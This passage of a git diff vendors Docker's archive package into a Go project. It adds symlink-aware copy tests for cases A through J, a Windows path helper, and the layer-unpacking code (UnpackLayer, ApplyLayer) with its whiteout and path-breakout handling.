+	defer removeAllPaths(tmpDirA, tmpDirB)
+
+	// Load A with some sample files and directories.
+	createSampleDir(t, tmpDirA)
+
+	srcPath := filepath.Join(tmpDirA, "file1")
+	dstPath := filepath.Join(tmpDirB, "itWorks.txt")
+
+	var err error
+
+	if err = testCopyHelper(t, srcPath, dstPath); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = fileContentsEqual(t, srcPath, dstPath); err != nil {
+		t.Fatal(err)
+	}
+	os.Remove(dstPath)
+
+	symlinkPath := filepath.Join(tmpDirA, "symlink3")
+	symlinkPath1 := filepath.Join(tmpDirA, "symlink4")
+	linkTarget := filepath.Join(tmpDirA, "file1")
+
+	if err = testCopyHelperFSym(t, symlinkPath, dstPath); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = fileContentsEqual(t, linkTarget, dstPath); err != nil {
+		t.Fatal(err)
+	}
+	os.Remove(dstPath)
+	if err = testCopyHelperFSym(t, symlinkPath1, dstPath); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = fileContentsEqual(t, linkTarget, dstPath); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// B. SRC specifies a file and DST (with trailing path separator) doesn't
+//    exist. This should cause an error because the copy operation cannot
+//    create a directory when copying a single file.
+func TestCopyCaseB(t *testing.T) {
+	tmpDirA, tmpDirB := getTestTempDirs(t)
+	defer removeAllPaths(tmpDirA, tmpDirB)
+
+	// Load A with some sample files and directories.
+	createSampleDir(t, tmpDirA)
+
+	srcPath := filepath.Join(tmpDirA, "file1")
+	dstDir := joinTrailingSep(tmpDirB, "testDir")
+
+	var err error
+
+	if err = testCopyHelper(t, srcPath, dstDir); err == nil {
+		t.Fatal("expected ErrDirNotExists error, but got nil instead")
+	}
+
+	if err != ErrDirNotExists {
+		t.Fatalf("expected ErrDirNotExists error, but got %T: %s", err, err)
+	}
+
+	symlinkPath := filepath.Join(tmpDirA, "symlink3")
+
+	if err = testCopyHelperFSym(t, symlinkPath, dstDir); err == nil {
+		t.Fatal("expected ErrDirNotExists error, but got nil instead")
+	}
+	if err != ErrDirNotExists {
+		t.Fatalf("expected ErrDirNotExists error, but got %T: %s", err, err)
+	}
+
+}
+
+// C. SRC specifies a file and DST exists as a file. This should overwrite
+//    the file at DST with the contents of the source file.
+func TestCopyCaseC(t *testing.T) {
+	tmpDirA, tmpDirB := getTestTempDirs(t)
+	defer removeAllPaths(tmpDirA, tmpDirB)
+
+	// Load A and B with some sample files and directories.
+	createSampleDir(t, tmpDirA)
+	createSampleDir(t, tmpDirB)
+
+	srcPath := filepath.Join(tmpDirA, "file1")
+	dstPath := filepath.Join(tmpDirB, "file2")
+
+	var err error
+
+	// Ensure they start out different.
+	if err = fileContentsEqual(t, srcPath, dstPath); err == nil {
+		t.Fatal("expected different file contents")
+	}
+
+	if err = testCopyHelper(t, srcPath, dstPath); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = fileContentsEqual(t, srcPath, dstPath); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// C. Symbol link following version:
+//    SRC specifies a file and DST exists as a file. This should overwrite
+//    the file at DST with the contents of the source file.
+func TestCopyCaseCFSym(t *testing.T) {
+	tmpDirA, tmpDirB := getTestTempDirs(t)
+	defer removeAllPaths(tmpDirA, tmpDirB)
+
+	// Load A and B with some sample files and directories.
+	createSampleDir(t, tmpDirA)
+	createSampleDir(t, tmpDirB)
+
+	symlinkPathBad := filepath.Join(tmpDirA, "symlink1")
+	symlinkPath := filepath.Join(tmpDirA, "symlink3")
+	linkTarget := filepath.Join(tmpDirA, "file1")
+	dstPath := filepath.Join(tmpDirB, "file2")
+
+	var err error
+
+	// first to test broken link
+	if err = testCopyHelperFSym(t, symlinkPathBad, dstPath); err == nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	// test symbol link -> symbol link -> target
+	// Ensure they start out different.
+	if err = fileContentsEqual(t, linkTarget, dstPath); err == nil {
+		t.Fatal("expected different file contents")
+	}
+
+	if err = testCopyHelperFSym(t, symlinkPath, dstPath); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = fileContentsEqual(t, linkTarget, dstPath); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// D. SRC specifies a file and DST exists as a directory. This should place
+//    a copy of the source file inside it using the basename from SRC. Ensure
+//    this works whether DST has a trailing path separator or not.
+func TestCopyCaseD(t *testing.T) {
+	tmpDirA, tmpDirB := getTestTempDirs(t)
+	defer removeAllPaths(tmpDirA, tmpDirB)
+
+	// Load A and B with some sample files and directories.
+	createSampleDir(t, tmpDirA)
+	createSampleDir(t, tmpDirB)
+
+	srcPath := filepath.Join(tmpDirA, "file1")
+	dstDir := filepath.Join(tmpDirB, "dir1")
+	dstPath := filepath.Join(dstDir, "file1")
+
+	var err error
+
+	// Ensure that dstPath doesn't exist.
+	if _, err = os.Stat(dstPath); !os.IsNotExist(err) {
+		t.Fatalf("did not expect dstPath %q to exist", dstPath)
+	}
+
+	if err = testCopyHelper(t, srcPath, dstDir); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = fileContentsEqual(t, srcPath, dstPath); err != nil {
+		t.Fatal(err)
+	}
+
+	// Now try again but using a trailing path separator for dstDir.
+
+	if err = os.RemoveAll(dstDir); err != nil {
+		t.Fatalf("unable to remove dstDir: %s", err)
+	}
+
+	if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil {
+		t.Fatalf("unable to make dstDir: %s", err)
+	}
+
+	dstDir = joinTrailingSep(tmpDirB, "dir1")
+
+	if err = testCopyHelper(t, srcPath, dstDir); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = fileContentsEqual(t, srcPath, dstPath); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// D. Symbol link following version:
+//    SRC specifies a file and DST exists as a directory. This should place
+//    a copy of the source file inside it using the basename from SRC. Ensure
+//    this works whether DST has a trailing path separator or not.
+func TestCopyCaseDFSym(t *testing.T) {
+	tmpDirA, tmpDirB := getTestTempDirs(t)
+	defer removeAllPaths(tmpDirA, tmpDirB)
+
+	// Load A and B with some sample files and directories.
+	createSampleDir(t, tmpDirA)
+	createSampleDir(t, tmpDirB)
+
+	srcPath := filepath.Join(tmpDirA, "symlink4")
+	linkTarget := filepath.Join(tmpDirA, "file1")
+	dstDir := filepath.Join(tmpDirB, "dir1")
+	dstPath := filepath.Join(dstDir, "symlink4")
+
+	var err error
+
+	// Ensure that dstPath doesn't exist.
+	if _, err = os.Stat(dstPath); !os.IsNotExist(err) {
+		t.Fatalf("did not expect dstPath %q to exist", dstPath)
+	}
+
+	if err = testCopyHelperFSym(t, srcPath, dstDir); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = fileContentsEqual(t, linkTarget, dstPath); err != nil {
+		t.Fatal(err)
+	}
+
+	// Now try again but using a trailing path separator for dstDir.
+
+	if err = os.RemoveAll(dstDir); err != nil {
+		t.Fatalf("unable to remove dstDir: %s", err)
+	}
+
+	if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil {
+		t.Fatalf("unable to make dstDir: %s", err)
+	}
+
+	dstDir = joinTrailingSep(tmpDirB, "dir1")
+
+	if err = testCopyHelperFSym(t, srcPath, dstDir); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = fileContentsEqual(t, linkTarget, dstPath); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// E. SRC specifies a directory and DST does not exist. This should create a
+//    directory at DST and copy the contents of the SRC directory into the DST
+//    directory. Ensure this works whether DST has a trailing path separator or
+//    not.
+func TestCopyCaseE(t *testing.T) {
+	tmpDirA, tmpDirB := getTestTempDirs(t)
+	defer removeAllPaths(tmpDirA, tmpDirB)
+
+	// Load A with some sample files and directories.
+	createSampleDir(t, tmpDirA)
+
+	srcDir := filepath.Join(tmpDirA, "dir1")
+	dstDir := filepath.Join(tmpDirB, "testDir")
+
+	var err error
+
+	if err = testCopyHelper(t, srcDir, dstDir); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = dirContentsEqual(t, dstDir, srcDir); err != nil {
+		t.Log("dir contents not equal")
+		logDirContents(t, tmpDirA)
+		logDirContents(t, tmpDirB)
+		t.Fatal(err)
+	}
+
+	// Now try again but using a trailing path separator for dstDir.
+
+	if err = os.RemoveAll(dstDir); err != nil {
+		t.Fatalf("unable to remove dstDir: %s", err)
+	}
+
+	dstDir = joinTrailingSep(tmpDirB, "testDir")
+
+	if err = testCopyHelper(t, srcDir, dstDir); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = dirContentsEqual(t, dstDir, srcDir); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// E. Symbol link following version:
+//    SRC specifies a directory and DST does not exist. This should create a
+//    directory at DST and copy the contents of the SRC directory into the DST
+//    directory. Ensure this works whether DST has a trailing path separator or
+//    not.
+func TestCopyCaseEFSym(t *testing.T) {
+	tmpDirA, tmpDirB := getTestTempDirs(t)
+	defer removeAllPaths(tmpDirA, tmpDirB)
+
+	// Load A with some sample files and directories.
+	createSampleDir(t, tmpDirA)
+
+	srcDir := filepath.Join(tmpDirA, "dirSymlink")
+	linkTarget := filepath.Join(tmpDirA, "dir1")
+	dstDir := filepath.Join(tmpDirB, "testDir")
+
+	var err error
+
+	if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = dirContentsEqual(t, dstDir, linkTarget); err != nil {
+		t.Log("dir contents not equal")
+		logDirContents(t, tmpDirA)
+		logDirContents(t, tmpDirB)
+		t.Fatal(err)
+	}
+
+	// Now try again but using a trailing path separator for dstDir.
+
+	if err = os.RemoveAll(dstDir); err != nil {
+		t.Fatalf("unable to remove dstDir: %s", err)
+	}
+
+	dstDir = joinTrailingSep(tmpDirB, "testDir")
+
+	if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = dirContentsEqual(t, dstDir, linkTarget); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// F. SRC specifies a directory and DST exists as a file. This should cause an
+//    error as it is not possible to overwrite a file with a directory.
+func TestCopyCaseF(t *testing.T) {
+	tmpDirA, tmpDirB := getTestTempDirs(t)
+	defer removeAllPaths(tmpDirA, tmpDirB)
+
+	// Load A and B with some sample files and directories.
+	createSampleDir(t, tmpDirA)
+	createSampleDir(t, tmpDirB)
+
+	srcDir := filepath.Join(tmpDirA, "dir1")
+	symSrcDir := filepath.Join(tmpDirA, "dirSymlink")
+	dstFile := filepath.Join(tmpDirB, "file1")
+
+	var err error
+
+	if err = testCopyHelper(t, srcDir, dstFile); err == nil {
+		t.Fatal("expected ErrCannotCopyDir error, but got nil instead")
+	}
+
+	if err != ErrCannotCopyDir {
+		t.Fatalf("expected ErrCannotCopyDir error, but got %T: %s", err, err)
+	}
+
+	// now test with symbol link
+	if err = testCopyHelperFSym(t, symSrcDir, dstFile); err == nil {
+		t.Fatal("expected ErrCannotCopyDir error, but got nil instead")
+	}
+
+	if err != ErrCannotCopyDir {
+		t.Fatalf("expected ErrCannotCopyDir error, but got %T: %s", err, err)
+	}
+}
+
+// G. SRC specifies a directory and DST exists as a directory. This should copy
+//    the SRC directory and all its contents to the DST directory. Ensure this
+//    works whether DST has a trailing path separator or not.
+func TestCopyCaseG(t *testing.T) {
+	tmpDirA, tmpDirB := getTestTempDirs(t)
+	defer removeAllPaths(tmpDirA, tmpDirB)
+
+	// Load A and B with some sample files and directories.
+	createSampleDir(t, tmpDirA)
+	createSampleDir(t, tmpDirB)
+
+	srcDir := filepath.Join(tmpDirA, "dir1")
+	dstDir := filepath.Join(tmpDirB, "dir2")
+	resultDir := filepath.Join(dstDir, "dir1")
+
+	var err error
+
+	if err = testCopyHelper(t, srcDir, dstDir); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = dirContentsEqual(t, resultDir, srcDir); err != nil {
+		t.Fatal(err)
+	}
+
+	// Now try again but using a trailing path separator for dstDir.
+
+	if err = os.RemoveAll(dstDir); err != nil {
+		t.Fatalf("unable to remove dstDir: %s", err)
+	}
+
+	if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil {
+		t.Fatalf("unable to make dstDir: %s", err)
+	}
+
+	dstDir = joinTrailingSep(tmpDirB, "dir2")
+
+	if err = testCopyHelper(t, srcDir, dstDir); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = dirContentsEqual(t, resultDir, srcDir); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// G. Symbol link version:
+//    SRC specifies a directory and DST exists as a directory. This should copy
+//    the SRC directory and all its contents to the DST directory. Ensure this
+//    works whether DST has a trailing path separator or not.
+func TestCopyCaseGFSym(t *testing.T) {
+	tmpDirA, tmpDirB := getTestTempDirs(t)
+	defer removeAllPaths(tmpDirA, tmpDirB)
+
+	// Load A and B with some sample files and directories.
+	createSampleDir(t, tmpDirA)
+	createSampleDir(t, tmpDirB)
+
+	srcDir := filepath.Join(tmpDirA, "dirSymlink")
+	linkTarget := filepath.Join(tmpDirA, "dir1")
+	dstDir := filepath.Join(tmpDirB, "dir2")
+	resultDir := filepath.Join(dstDir, "dirSymlink")
+
+	var err error
+
+	if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = dirContentsEqual(t, resultDir, linkTarget); err != nil {
+		t.Fatal(err)
+	}
+
+	// Now try again but using a trailing path separator for dstDir.
+
+	if err = os.RemoveAll(dstDir); err != nil {
+		t.Fatalf("unable to remove dstDir: %s", err)
+	}
+
+	if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil {
+		t.Fatalf("unable to make dstDir: %s", err)
+	}
+
+	dstDir = joinTrailingSep(tmpDirB, "dir2")
+
+	if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = dirContentsEqual(t, resultDir, linkTarget); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// H. SRC specifies a directory's contents only and DST does not exist. This
+//    should create a directory at DST and copy the contents of the SRC
+//    directory (but not the directory itself) into the DST directory. Ensure
+//    this works whether DST has a trailing path separator or not.
+func TestCopyCaseH(t *testing.T) {
+	tmpDirA, tmpDirB := getTestTempDirs(t)
+	defer removeAllPaths(tmpDirA, tmpDirB)
+
+	// Load A with some sample files and directories.
+	createSampleDir(t, tmpDirA)
+
+	srcDir := joinTrailingSep(tmpDirA, "dir1") + "."
+	dstDir := filepath.Join(tmpDirB, "testDir")
+
+	var err error
+
+	if err = testCopyHelper(t, srcDir, dstDir); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = dirContentsEqual(t, dstDir, srcDir); err != nil {
+		t.Log("dir contents not equal")
+		logDirContents(t, tmpDirA)
+		logDirContents(t, tmpDirB)
+		t.Fatal(err)
+	}
+
+	// Now try again but using a trailing path separator for dstDir.
+
+	if err = os.RemoveAll(dstDir); err != nil {
+		t.Fatalf("unable to remove dstDir: %s", err)
+	}
+
+	dstDir = joinTrailingSep(tmpDirB, "testDir")
+
+	if err = testCopyHelper(t, srcDir, dstDir); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = dirContentsEqual(t, dstDir, srcDir); err != nil {
+		t.Log("dir contents not equal")
+		logDirContents(t, tmpDirA)
+		logDirContents(t, tmpDirB)
+		t.Fatal(err)
+	}
+}
+
+// H. Symbol link following version:
+//    SRC specifies a directory's contents only and DST does not exist. This
+//    should create a directory at DST and copy the contents of the SRC
+//    directory (but not the directory itself) into the DST directory. Ensure
+//    this works whether DST has a trailing path separator or not.
+func TestCopyCaseHFSym(t *testing.T) {
+	tmpDirA, tmpDirB := getTestTempDirs(t)
+	defer removeAllPaths(tmpDirA, tmpDirB)
+
+	// Load A with some sample files and directories.
+	createSampleDir(t, tmpDirA)
+
+	srcDir := joinTrailingSep(tmpDirA, "dirSymlink") + "."
+	linkTarget := filepath.Join(tmpDirA, "dir1")
+	dstDir := filepath.Join(tmpDirB, "testDir")
+
+	var err error
+
+	if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = dirContentsEqual(t, dstDir, linkTarget); err != nil {
+		t.Log("dir contents not equal")
+		logDirContents(t, tmpDirA)
+		logDirContents(t, tmpDirB)
+		t.Fatal(err)
+	}
+
+	// Now try again but using a trailing path separator for dstDir.
+
+	if err = os.RemoveAll(dstDir); err != nil {
+		t.Fatalf("unable to remove dstDir: %s", err)
+	}
+
+	dstDir = joinTrailingSep(tmpDirB, "testDir")
+
+	if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = dirContentsEqual(t, dstDir, linkTarget); err != nil {
+		t.Log("dir contents not equal")
+		logDirContents(t, tmpDirA)
+		logDirContents(t, tmpDirB)
+		t.Fatal(err)
+	}
+}
+
+// I. SRC specifies a directory's contents only and DST exists as a file. This
+//    should cause an error as it is not possible to overwrite a file with a
+//    directory.
+func TestCopyCaseI(t *testing.T) {
+	tmpDirA, tmpDirB := getTestTempDirs(t)
+	defer removeAllPaths(tmpDirA, tmpDirB)
+
+	// Load A and B with some sample files and directories.
+	createSampleDir(t, tmpDirA)
+	createSampleDir(t, tmpDirB)
+
+	srcDir := joinTrailingSep(tmpDirA, "dir1") + "."
+	symSrcDir := filepath.Join(tmpDirB, "dirSymlink")
+	dstFile := filepath.Join(tmpDirB, "file1")
+
+	var err error
+
+	if err = testCopyHelper(t, srcDir, dstFile); err == nil {
+		t.Fatal("expected ErrCannotCopyDir error, but got nil instead")
+	}
+
+	if err != ErrCannotCopyDir {
+		t.Fatalf("expected ErrCannotCopyDir error, but got %T: %s", err, err)
+	}
+
+	// now try with symbol link of dir
+	if err = testCopyHelperFSym(t, symSrcDir, dstFile); err == nil {
+		t.Fatal("expected ErrCannotCopyDir error, but got nil instead")
+	}
+
+	if err != ErrCannotCopyDir {
+		t.Fatalf("expected ErrCannotCopyDir error, but got %T: %s", err, err)
+	}
+}
+
+// J. SRC specifies a directory's contents only and DST exists as a directory.
+//    This should copy the contents of the SRC directory (but not the directory
+//    itself) into the DST directory. Ensure this works whether DST has a
+//    trailing path separator or not.
+func TestCopyCaseJ(t *testing.T) {
+	tmpDirA, tmpDirB := getTestTempDirs(t)
+	defer removeAllPaths(tmpDirA, tmpDirB)
+
+	// Load A and B with some sample files and directories.
+	createSampleDir(t, tmpDirA)
+	createSampleDir(t, tmpDirB)
+
+	srcDir := joinTrailingSep(tmpDirA, "dir1") + "."
+	dstDir := filepath.Join(tmpDirB, "dir5")
+
+	var err error
+
+	// first to create an empty dir
+	if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil {
+		t.Fatalf("unable to make dstDir: %s", err)
+	}
+
+	if err = testCopyHelper(t, srcDir, dstDir); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = dirContentsEqual(t, dstDir, srcDir); err != nil {
+		t.Fatal(err)
+	}
+
+	// Now try again but using a trailing path separator for dstDir.
+
+	if err = os.RemoveAll(dstDir); err != nil {
+		t.Fatalf("unable to remove dstDir: %s", err)
+	}
+
+	if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil {
+		t.Fatalf("unable to make dstDir: %s", err)
+	}
+
+	dstDir = joinTrailingSep(tmpDirB, "dir5")
+
+	if err = testCopyHelper(t, srcDir, dstDir); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = dirContentsEqual(t, dstDir, srcDir); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// J. Symbol link following version:
+//    SRC specifies a directory's contents only and DST exists as a directory.
+//    This should copy the contents of the SRC directory (but not the directory
+//    itself) into the DST directory. Ensure this works whether DST has a
+//    trailing path separator or not.
+func TestCopyCaseJFSym(t *testing.T) {
+	tmpDirA, tmpDirB := getTestTempDirs(t)
+	defer removeAllPaths(tmpDirA, tmpDirB)
+
+	// Load A and B with some sample files and directories.
+	createSampleDir(t, tmpDirA)
+	createSampleDir(t, tmpDirB)
+
+	srcDir := joinTrailingSep(tmpDirA, "dirSymlink") + "."
+	linkTarget := filepath.Join(tmpDirA, "dir1")
+	dstDir := filepath.Join(tmpDirB, "dir5")
+
+	var err error
+
+	// first to create an empty dir
+	if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil {
+		t.Fatalf("unable to make dstDir: %s", err)
+	}
+
+	if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = dirContentsEqual(t, dstDir, linkTarget); err != nil {
+		t.Fatal(err)
+	}
+
+	// Now try again but using a trailing path separator for dstDir.
+
+	if err = os.RemoveAll(dstDir); err != nil {
+		t.Fatalf("unable to remove dstDir: %s", err)
+	}
+
+	if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil {
+		t.Fatalf("unable to make dstDir: %s", err)
+	}
+
+	dstDir = joinTrailingSep(tmpDirB, "dir5")
+
+	if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil {
+		t.Fatalf("unexpected error %T: %s", err, err)
+	}
+
+	if err = dirContentsEqual(t, dstDir, linkTarget); err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/copy_windows.go b/vendor/github.com/docker/docker/pkg/archive/copy_windows.go
new file mode 100644
index 0000000000..2b775b45c4
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/copy_windows.go
@@ -0,0 +1,9 @@
+package archive
+
+import (
+	"path/filepath"
+)
+
+func normalizePath(path string) string {
+	return filepath.FromSlash(path)
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/diff.go b/vendor/github.com/docker/docker/pkg/archive/diff.go
new file mode 100644
index 0000000000..9e1a58c499
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/diff.go
@@ -0,0 +1,279 @@
+package archive
+
+import (
+	"archive/tar"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"runtime"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/pools"
+	"github.com/docker/docker/pkg/system"
+)
+
+// UnpackLayer unpack `layer` to a `dest`. The stream `layer` can be
+// compressed or uncompressed.
+// Returns the size in bytes of the contents of the layer.
+func UnpackLayer(dest string, layer io.Reader, options *TarOptions) (size int64, err error) {
+	tr := tar.NewReader(layer)
+	trBuf := pools.BufioReader32KPool.Get(tr)
+	defer pools.BufioReader32KPool.Put(trBuf)
+
+	var dirs []*tar.Header
+	unpackedPaths := make(map[string]struct{})
+
+	if options == nil {
+		options = &TarOptions{}
+	}
+	if options.ExcludePatterns == nil {
+		options.ExcludePatterns = []string{}
+	}
+	remappedRootUID, remappedRootGID, err := idtools.GetRootUIDGID(options.UIDMaps, options.GIDMaps)
+	if err != nil {
+		return 0, err
+	}
+
+	aufsTempdir := ""
+	aufsHardlinks := make(map[string]*tar.Header)
+
+	if options == nil {
+		options = &TarOptions{}
+	}
+	// Iterate through the files in the archive.
+	for {
+		hdr, err := tr.Next()
+		if err == io.EOF {
+			// end of tar archive
+			break
+		}
+		if err != nil {
+			return 0, err
+		}
+
+		size += hdr.Size
+
+		// Normalize name, for safety and for a simple is-root check
+		hdr.Name = filepath.Clean(hdr.Name)
+
+		// Windows does not support filenames with colons in them. Ignore
+		// these files. This is not a problem though (although it might
+		// appear that it is). Let's suppose a client is running docker pull.
+		// The daemon it points to is Windows. Would it make sense for the
+		// client to be doing a docker pull Ubuntu for example (which has files
+		// with colons in the name under /usr/share/man/man3)? No, absolutely
+		// not as it would really only make sense that they were pulling a
+		// Windows image. However, for development, it is necessary to be able
+		// to pull Linux images which are in the repository.
+		//
+		// TODO Windows. Once the registry is aware of what images are Windows-
+		// specific or Linux-specific, this warning should be changed to an error
+		// to cater for the situation where someone does manage to upload a Linux
+		// image but have it tagged as Windows inadvertently.
+		if runtime.GOOS == "windows" {
+			if strings.Contains(hdr.Name, ":") {
+				logrus.Warnf("Windows: Ignoring %s (is this a Linux image?)", hdr.Name)
+				continue
+			}
+		}
+
+		// Note as these operations are platform specific, so must the slash be.
+		if !strings.HasSuffix(hdr.Name, string(os.PathSeparator)) {
+			// Not the root directory, ensure that the parent directory exists.
+			// This happened in some tests where an image had a tarfile without any
+			// parent directories.
+			parent := filepath.Dir(hdr.Name)
+			parentPath := filepath.Join(dest, parent)
+
+			if _, err := os.Lstat(parentPath); err != nil && os.IsNotExist(err) {
+				err = system.MkdirAll(parentPath, 0600)
+				if err != nil {
+					return 0, err
+				}
+			}
+		}
+
+		// Skip AUFS metadata dirs
+		if strings.HasPrefix(hdr.Name, WhiteoutMetaPrefix) {
+			// Regular files inside /.wh..wh.plnk can be used as hardlink targets
+			// We don't want this directory, but we need the files in them so that
+			// such hardlinks can be resolved.
+			if strings.HasPrefix(hdr.Name, WhiteoutLinkDir) && hdr.Typeflag == tar.TypeReg {
+				basename := filepath.Base(hdr.Name)
+				aufsHardlinks[basename] = hdr
+				if aufsTempdir == "" {
+					if aufsTempdir, err = ioutil.TempDir("", "dockerplnk"); err != nil {
+						return 0, err
+					}
+					defer os.RemoveAll(aufsTempdir)
+				}
+				if err := createTarFile(filepath.Join(aufsTempdir, basename), dest, hdr, tr, true, nil, options.InUserNS); err != nil {
+					return 0, err
+				}
+			}
+
+			if hdr.Name != WhiteoutOpaqueDir {
+				continue
+			}
+		}
+		path := filepath.Join(dest, hdr.Name)
+		rel, err := filepath.Rel(dest, path)
+		if err != nil {
+			return 0, err
+		}
+
+		// Note as these operations are platform specific, so must the slash be.
+		if strings.HasPrefix(rel, ".."+string(os.PathSeparator)) {
+			return 0, breakoutError(fmt.Errorf("%q is outside of %q", hdr.Name, dest))
+		}
+		base := filepath.Base(path)
+
+		if strings.HasPrefix(base, WhiteoutPrefix) {
+			dir := filepath.Dir(path)
+			if base == WhiteoutOpaqueDir {
+				_, err := os.Lstat(dir)
+				if err != nil {
+					return 0, err
+				}
+				err = filepath.Walk(dir, func(path string, info os.FileInfo, err error) error {
+					if err != nil {
+						if os.IsNotExist(err) {
+							err = nil // parent was deleted
+						}
+						return err
+					}
+					if path == dir {
+						return nil
+					}
+					if _, exists := unpackedPaths[path]; !exists {
+						err := os.RemoveAll(path)
+						return err
+					}
+					return nil
+				})
+				if err != nil {
+					return 0, err
+				}
+			} else {
+				originalBase := base[len(WhiteoutPrefix):]
+				originalPath := filepath.Join(dir, originalBase)
+				if err := os.RemoveAll(originalPath); err != nil {
+					return 0, err
+				}
+			}
+		} else {
+			// If path exits we almost always just want to remove and replace it.
+			// The only exception is when it is a directory *and* the file from
+			// the layer is also a directory. Then we want to merge them (i.e.
+			// just apply the metadata from the layer).
+			if fi, err := os.Lstat(path); err == nil {
+				if !(fi.IsDir() && hdr.Typeflag == tar.TypeDir) {
+					if err := os.RemoveAll(path); err != nil {
+						return 0, err
+					}
+				}
+			}
+
+			trBuf.Reset(tr)
+			srcData := io.Reader(trBuf)
+			srcHdr := hdr
+
+			// Hard links into /.wh..wh.plnk don't work, as we don't extract that directory, so
+			// we manually retarget these into the temporary files we extracted them into
+			if hdr.Typeflag == tar.TypeLink && strings.HasPrefix(filepath.Clean(hdr.Linkname), WhiteoutLinkDir) {
+				linkBasename := filepath.Base(hdr.Linkname)
+				srcHdr = aufsHardlinks[linkBasename]
+				if srcHdr == nil {
+					return 0, fmt.Errorf("Invalid aufs hardlink")
+				}
+				tmpFile, err := os.Open(filepath.Join(aufsTempdir, linkBasename))
+				if err != nil {
+					return 0, err
+				}
+				defer tmpFile.Close()
+				srcData = tmpFile
+			}
+
+			// if the options contain a uid & gid maps, convert header uid/gid
+			// entries using the maps such that lchown sets the proper mapped
+			// uid/gid after writing the file. We only perform this mapping if
+			// the file isn't already owned by the remapped root UID or GID, as
+			// that specific uid/gid has no mapping from container -> host, and
+			// those files already have the proper ownership for inside the
+			// container.
+			if srcHdr.Uid != remappedRootUID {
+				xUID, err := idtools.ToHost(srcHdr.Uid, options.UIDMaps)
+				if err != nil {
+					return 0, err
+				}
+				srcHdr.Uid = xUID
+			}
+			if srcHdr.Gid != remappedRootGID {
+				xGID, err := idtools.ToHost(srcHdr.Gid, options.GIDMaps)
+				if err != nil {
+					return 0, err
+				}
+				srcHdr.Gid = xGID
+			}
+			if err := createTarFile(path, dest, srcHdr, srcData, true, nil, options.InUserNS); err != nil {
+				return 0, err
+			}
+
+			// Directory mtimes must be handled at the end to avoid further
+			// file creation in them to modify the directory mtime
+			if hdr.Typeflag == tar.TypeDir {
+				dirs = append(dirs, hdr)
+			}
+			unpackedPaths[path] = struct{}{}
+		}
+	}
+
+	for _, hdr := range dirs {
+		path := filepath.Join(dest, hdr.Name)
+		if err := system.Chtimes(path, hdr.AccessTime, hdr.ModTime); err != nil {
+			return 0, err
+		}
+	}
+
+	return size, nil
+}
+
+// ApplyLayer parses a diff in the standard layer format from `layer`,
+// and applies it to the directory `dest`. The stream `layer` can be
+// compressed or uncompressed.
+// Returns the size in bytes of the contents of the layer.
+func ApplyLayer(dest string, layer io.Reader) (int64, error) {
+	return applyLayerHandler(dest, layer, &TarOptions{}, true)
+}
+
